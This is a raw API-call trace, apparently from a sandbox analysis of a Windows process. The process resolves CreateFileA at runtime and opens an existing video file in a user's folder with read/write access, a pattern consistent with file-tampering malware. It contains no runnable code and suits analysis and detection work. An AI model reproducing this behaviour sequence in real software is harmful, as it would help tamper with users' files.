dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0197.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.608] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0197.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0197.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9b68 [0197.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9b68, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0197.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.609] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0197.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0197.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0197.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0197.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0197.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9b68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0197.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.609] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0197.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0197.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0197.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0197.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0197.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0197.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0197.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi", cchWideChar=111, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 111 [0197.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6f) returned 0x906f38 [0197.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi", cchWideChar=111, lpMultiByteStr=0x906f38, cbMultiByte=111, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi", lpUsedDefaultChar=0x0) returned 111 [0197.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0197.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0197.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.611] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho\\suitfltgqdh7fzsjoo.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0197.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0197.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0197.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0197.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0197.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0197.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0197.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=111, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0197.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xde) returned 0x907778 [0197.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=111, lpWideCharStr=0x907778, cchWideChar=111 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi") returned 111 [0197.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0197.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x907340 [0197.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0197.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0197.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0197.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0197.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0197.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0197.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0197.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0197.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0197.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0197.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0197.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0197.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0197.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0197.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0197.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0197.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0197.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0197.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0197.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0197.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0197.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0197.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0197.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0197.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0197.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0197.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0197.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0197.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0197.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0197.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0197.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0197.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0197.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0197.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0197.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0197.614] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0197.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0197.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0197.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0197.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0197.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.616] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0197.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0197.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0197.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0197.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0197.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0197.616] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0197.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0197.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0197.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0197.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0197.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0197.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0197.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0197.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0197.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0197.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0197.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0197.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0197.617] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0197.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0197.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0197.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0197.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0197.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0197.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0197.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0197.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.618] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0197.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 